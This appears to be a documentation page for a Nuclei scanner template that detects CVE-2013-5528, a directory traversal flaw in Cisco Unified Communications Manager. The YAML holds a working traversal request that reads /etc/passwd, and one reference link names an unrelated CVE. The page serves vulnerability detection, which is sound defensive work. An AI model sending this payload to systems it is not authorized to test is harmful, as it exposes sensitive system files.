Cisco Unified Communications Manager 7/8/9 - Directory Traversal
ID: CVE-2013-5528
Severity: medium
Author: daffainfo
Tags: cve2013,cve,lfi,cisco,edb
Description
Section titled “Description”A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
YAML Source
Section titled “YAML Source”id: CVE-2013-5528
info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 impact: | Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 epss-score: 0.00534 epss-percentile: 0.74722 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco product: unified_communications_manager tags: cve2013,cve,lfi,cisco,edb
http: - method: GET path: - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100c4e2411739e8df420090137c478c06ddf895df0effc8d338e3e68037c6ccc3770220170c5a70877e994507dd35794724a2f814d175f4827669629997146e572cc5e2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2013/CVE-2013-5528.yaml"